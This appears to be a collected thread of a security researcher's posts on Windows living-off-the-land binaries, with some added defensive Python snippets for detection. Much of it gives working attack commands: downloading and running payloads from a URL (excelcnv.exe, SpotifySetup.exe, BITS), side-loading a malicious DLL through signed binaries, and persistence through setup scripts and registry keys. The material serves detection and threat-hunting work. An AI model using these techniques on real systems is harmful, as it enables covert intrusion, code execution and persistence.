This tweet contains well-researched information presented in a politically neutral manner and can only be interpreted in a single way w/o causing any emotional response in the reader. It is factual. It is unconditional. It is absolute. It is uncancellable.
This is the most important security change you will do today.
1. Find c:\Program Files\Common Files\microsoft shared\OFFICE15\1033\MSOINTL.DLL
(adjust path for your Office version).
2. Hex-edit "Enable Content" to whatever you want e.g. "Infect System".
3. You are welcome.
C:\Program Files*\Microsoft Office\root\Office*\excelcnv.exe
accepts a URL, so you can use it as a downloader
excelcnv.exe -oice <URL> <filename>
caveat? your download will be saved as an XLSX and the binary data will be stored UTF-8 encoded inside xl\sharedStrings.xml
#LOLBIN
Mini #Lolbin
1. Copy c:\WINDOWS\system32\WebCache.exe to a different location
2. Drop malicious wininet.dll there
3. Run:
WebCache.exe 1 1
This will load the malicious wininet.dll via LoadLibraryW
DO NOT TRY ON YOUR PRODUCTION SYSTEM*
ms-cxh-full://foo
will block your win10 desktop (doesn't work on win11)
DO NOT TRY ON YOUR PRODUCTION SYSTEM*
*atm I don't know how to exit the thing
kudos to @0gtweet who inspired me to look at lolbin stuff again (as is often the case)
so... everyone knows we can use ftp.exe as a lolbin
using COMSPEC trick we can do it again
set comspec=c:\windows\notepad.exe
ftp.exe
!
A nice, little Downloads&Execute
#LOLBIN
feature of signed SpotifySetup.exe
SpotifySetup.exe --url <url>
Other options
--mu ..\..\..\..\..\..\..\..\test\ downloads that file to c:\test\SpWebInst0.exe and launches from there
--silent - quieter, but mini-GUI still shows up
I wrote about side-loading of MSFTEDIT.DLL before and today realized that charmap.exe uses LoadLibrary as well
1. save payload as MSFTEDIT.DLL
2. copy c:\windows\system32\charmap.exe .
3. charmap.exe
If Broadcom buys VMware the RCE analysts working there will be called Broadcom VMware CarbonBlack CA Technologies Symantec Norton Lastline Reverse Code Engineering Analysts
If you rely on CommandLine in Sysmon, you may want to check this out. And I am almost certain someone did point it out before... oh well...
examples:
c:\windows\system32\calc.exe\..\notepad.exe
c:\windows\system32\calc.exe\..\..\system32\notepad.exe
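As an added defender-side example (not from the tweet): normalise a Sysmon CommandLine before matching, so a rule keyed on the image path sees notepad.exe rather than the calc.exe the raw string suggests. The command lines below are constructed samples, not real telemetry.

```python
import ntpath
import re

# Constructed Sysmon-style CommandLine values (sample data, not real telemetry).
SAMPLE_COMMAND_LINES = [
    r"c:\windows\system32\calc.exe\..\notepad.exe",
    r"c:\windows\system32\calc.exe\..\..\system32\notepad.exe",
    r'"c:\windows\system32\notepad.exe" c:\test\a.txt',
    r"C:\Windows\System32\cmd.exe /c whoami",
]


def executable_from_command_line(cmdline):
    """Return the program token of a command line, honouring a quoted path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end != -1 else cmdline[1:]
    return cmdline.split(None, 1)[0]


def has_dotdot_traversal(path):
    """True if any path segment is '..' (the trick the tweet demonstrates)."""
    return ".." in re.split(r"[\\/]+", path)


def flag_command_line(cmdline):
    """Resolve the image path lexically (collapsing '..' the way the Windows
    path parser does before the file is opened) and report whether the raw
    command line hid the real target behind a traversal."""
    raw_image = executable_from_command_line(cmdline)
    resolved = ntpath.normpath(raw_image).lower()
    return {
        "raw_image": raw_image,
        "resolved_image": resolved,
        "traversal": has_dotdot_traversal(raw_image),
    }


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(flag_command_line(line))
```

Match your image-path rules against `resolved_image`, and treat `traversal` being set on a process-creation event as a signal in its own right.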
I guess everyone knows about this Lolbin:
RunDll32.exe shell32.dll,Control_RunDLL c:\test\test.dll
but about this one?
RunDll32.exe Shell32.dll,Control_RunDLLAsUser c:\test\test.dll
#LOLBIN
looks like Windows tar can BASE64-encode and UUEncode
tar -c -f <out> --b64encode <in>
tar -c -f <out> --uuencode <in>
and it can run (lolbin) other programs the same as its *nix counterpart
tar -cff --use-compress-program calc f
C:\Program Files\Internet Explorer>set windir=c:\test
C:\Program Files\Internet Explorer>iediagcmd.exe /out:c:\test\
will run c:\test\system32\netsh.exe of your choice
#lolbin
via env. var. windir
a silly way to launch programs at a predetermined position in a great-great-great....grand-child relationship
start /b "" start /b "" start /b "" start /b "" start /b "" start /b notepad.exe
/b takes care of conhost.exe processes (aka all share same console)
so, how many of you visited solar leaks page from your main working computer, on your production network?
the number of infosec people posting a direct link to it is mind-blowing
the assumption should be that it's hosted by attackers, hello?
combing through my old code I found one of my early API hooking experiments from early 2006 -- by hooking ExtTextOut I was able to steal text from any application (a global hook was there to catch new programs as well) -- I guess I should have written that EDR back then ;)
Certulitis - one tool that keeps on giving
e.g.
set CERTSRV_LOGFILE=c:\test\foo.log
set CERTSRV_DEBUG=0xFFFFFFFF
certutil you never knew existed (good clickbait!)
what are download cradles out there?
I know of this nice list
any other repos like this?
IE/VBS, python, ruby, perl, gcc, git, wget, curl with exec/eval?
This is a far more interesting 'feature' of setup.exe - a persistence trick really
Drop your payload to
c:\WINDOWS\Setup\Scripts\ErrorHandler.cmd
and c:\WINDOWS\system32\oobe\Setup.exe will load it anytime it errors (at least; enough to run it w/o cmd line to trigger)
curl (included Windows version) built-in support for parentheses and square brackets is fun and may evade some naive regexes
curl {http://...}
curl {h}{t}{t}{p}://...
curl .../{foo}{bar} -o #2#1
// will save the downloaded file as "barfoo"
curl [1-5]
// awkward delay via DNS
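An added example, not from the tweet, that expands curl's {..} and [..] globbing the way curl does before a detection regex runs over the command line, so `{h}{t}{t}{p}://` is seen as `http://`. The URLs are constructed, and the expander covers only the {a,b} and [lo-hi[:step]] forms.

```python
import itertools
import re

# One curl glob: {alt1,alt2,...} or [lo-hi] / [lo-hi:step]
GLOB = re.compile(r"\{([^{}]*)\}|\[([^\[\]]+)\]")


def _range_values(spec):
    """Expand curl's [1-5], [01-10], [a-z] and [0-100:25] range syntax."""
    m = re.fullmatch(r"(\w+)-(\w+)(?::(\d+))?", spec)
    if not m:
        return [spec]
    lo, hi, step = m.group(1), m.group(2), int(m.group(3) or 1)
    if lo.isdigit() and hi.isdigit():
        width = len(lo) if lo.startswith("0") else 0
        return [str(n).zfill(width) for n in range(int(lo), int(hi) + 1, step)]
    if len(lo) == 1 and len(hi) == 1:
        return [chr(c) for c in range(ord(lo), ord(hi) + 1, step)]
    return [spec]


def expand_curl_glob(url):
    """Return (expanded URLs, per-URL tuple of the glob values that built it)."""
    literal, alternatives, last = [], [], 0
    for m in GLOB.finditer(url):
        literal.append(url[last:m.start()])
        if m.group(1) is not None:            # {a,b,c}
            alternatives.append(m.group(1).split(","))
        else:                                  # [lo-hi[:step]]
            alternatives.append(_range_values(m.group(2)))
        last = m.end()
    tail = url[last:]
    urls, used = [], []
    for combo in itertools.product(*alternatives):
        urls.append("".join(p + c for p, c in zip(literal, combo)) + tail)
        used.append(combo)
    return urls, used


def output_names(template, used):
    """Resolve '#N' in an -o template to the N-th glob value of each URL."""
    names = []
    for combo in used:
        names.append(re.sub(r"#(\d+)", lambda m: combo[int(m.group(1)) - 1], template))
    return names


def looks_like_http_download(url):
    """Detection helper: does any expansion of the argument start with http(s)://?"""
    return any(re.match(r"https?://", u) for u in expand_curl_glob(url)[0])
```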
It's really worth updating Process Hacker on regular basis
TIL new versions include very advanced PE file viewer showing lots of cool info, both static and dynamic and from the file and file system, all in one place
In 2010 I worked a case working 18h/day, for a month, developed insomnia. Didn't get any extra pay, no one said thank you. It changed the way I work. I then started my blog. 10 years later still not sleeping enough & yet still loving it. Channel your obsessions properly kids :)
Beyond good ol’ Run key, Part 108
#dfir
#malware
Using HKLM\SOFTWARE\Microsoft\Wow64\x86\<processname> to inject 64-bit DLL of your choice into 32-bit processes
if you ever get bored using "copy" to copy files you can always use ... curl
curl file://c:\test\foo -o bar
same way, you can use it instead of "type" or "cat"
curl file://c:\test\foo
Copy c:\WINDOWS\system32\oobe\Setup.exe to c:\test
Drop payload to c:\test\winsetup.dll
setup.exe will load c:\test\winsetup.dll
lots of other side-loading opportunities there really (see screenshot), but still lame, cuz need admin rights to run setup.exe :(
win10
drop C:\Windows\System32\ntwdblib.dll
run c:\WINDOWS\system32\cliconfg.exe
ntwdblib.dll will get loaded
too many caveats (admin rights, UAC) for it to be useful, but always...
kinda lame persistence trick, kinda lame lolbin - 2 in one lame :)
Beyond good ol’ Run key, Part 136 (Persistence trick + #lolbin in 1) x 2
Thx to test Office DLLs:
HKCU\SOFTWARE\Microsoft\Office\16.0\
Word\WwlibtDll -> wwlibt.dll
PowerPoint\PPCoreTDLL -> ppcoret.dll
#DFIR
Powershell keywords: what stuff do you look for inside the Script Blocks?
This is a great cheatsheet that contains a lot of keywords (by Malware Archaeology)
but wondering if this could be improved. reversed strings? new keywords for new ps modules?
Did anyone look at w32tm.exe for C2 comms?
w32tm /monitor /computers:xxx
w32tm /stripchart /computer:xxx
W32tm /query /computer:xxx
connect out to xxx:123
w32tm /stripchart /computer:xxx /ipprotocol:6
will use IPv6
Printing #LOLBIN
create dummy file (foo)
copy rundll32.exe to c:\test\rundll32.exe
copy DLL payload to c:\test\photowiz.dll
run
rundll32 c:\WINDOWS\system32\shimgvw.dll,ImageView_PrintTo c:\test\foo
ImageView_PrintToA & ImageView_PrintToW should work too (W needs Unicode tho)
inspired by @SentinelOne research on desktopimgdownldr
here is a list of native exes using BITS to download stuff...
#LOLBIN
potentials
❓aitstatic
✔️bitsadmin
✔️desktopimgdownldr
❓DeviceEnroller
❓directxdatabaseupdater
❓MDMAppInstaller
❓SpeechModelDownload
Excelling with sysmon configs yes, it is what it sounds like; a totally cringeworthy experience :) kudos to @ionstorm for his sysmon config that I tortured with this idea
#threathunting
#dfir
Just in case you are wondering, Mitre Att&ck misses and quite a bit. This is not a criticism per se -- it's a great framework and work in progress. These things will be eventually added (and sometimes corrected).
I blatantly hijacked the idea and added some practical advice on how to become Alex 2.0. Reversing w/o reversing – how to become Alex in practice cc @aionescu
lulz, I created this .exe file from strings reported in one of the malware reports - no code inside other than ExitProcess, just strings... tell me that next-gen and others don't rely on signatures :-D
#malware
ms-cxh - the Cloud Experience Host handler has some interesting strings it accepts e.g.
ms-cxh://SETADDLOCALONLY creates new user
ms-cxh://NTHNGCUPSELL creates PIN
ms-cxh://RDXRACSKUINCLUSIVE get latest demo content and apps
full list
today got an idea to look at .TLB files as a possible code injection trick (it has a built-in, but rarely used 'helpstringdll' reference that points to a DLL)
after some googling discovered @StanHacked already did great research on this topic!
You got your Sysmon config
You plug it in to your ELK/Splunk
Detections start coming in and are tagged with Mitre Att&ck techniques
2 Questions:
- How do you refer to these detections, if at all?
- How do you process / analyze them? (alert/dashboard/?)
genuine Qs
fun fact:
if you append any .cab file to extrac32.exe, then when you run this new file, the extrac32.exe stub will extract the content of the appended .cab file w/o any question; I guess files with the _A_EXEC attr should be executed (have not tried)
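An added forensic check, not the author's code: locate the overlay appended after the last PE section and test whether it starts with the MSCF cabinet magic, which is how a .cab glued onto extrac32.exe (or any other signed stub) would show up. The sample is a constructed minimal PE-like blob, not a real extrac32.exe.

```python
import struct

CAB_MAGIC = b"MSCF"


def pe_end_of_image_data(data):
    """Return the file offset where the last PE section's raw data ends."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", data, coff + 2)   # NumberOfSections
    opt_size, = struct.unpack_from("<H", data, coff + 16)      # SizeOfOptionalHeader
    sect = coff + 20 + opt_size                                 # first IMAGE_SECTION_HEADER
    end = sect + 40 * num_sections                              # at least past the section table
    for i in range(num_sections):
        # SizeOfRawData and PointerToRawData sit at +16 and +20 of each 40-byte header
        raw_size, raw_ptr = struct.unpack_from("<II", data, sect + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return end


def find_overlay(data):
    """Return (overlay_bytes, is_cab) for any trailing data beyond the PE image."""
    overlay = data[pe_end_of_image_data(data):]
    return overlay, overlay[:4] == CAB_MAGIC


def build_sample():
    """Constructed test file: one-section PE skeleton followed by a fake CAB header."""
    e_lfanew, opt_size = 0x40, 0xE0
    sect_table = e_lfanew + 4 + 20 + opt_size
    raw_ptr, raw_size = 0x200, 0x10
    hdr = bytearray(raw_ptr)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    hdr[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<H", hdr, e_lfanew + 4 + 2, 1)            # NumberOfSections = 1
    struct.pack_into("<H", hdr, e_lfanew + 4 + 16, opt_size)    # SizeOfOptionalHeader
    struct.pack_into("<II", hdr, sect_table + 16, raw_size, raw_ptr)
    return bytes(hdr) + b"\0" * raw_size + CAB_MAGIC + b"\0" * 12


SAMPLE = build_sample()
```

Run `find_overlay` over the bytes of a suspect file; a non-empty overlay on a Microsoft-signed binary is worth a look on its own, and an MSCF prefix names the trick.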
TIL there is cdb.exe in VMware Workstation
c:\Program Files (x86)\VMware\VMware Workstation\OVFTool\cdb.exe
cc @Oddvarmoe perhaps worth updating
can help to dump memory, and lots of other funny stuff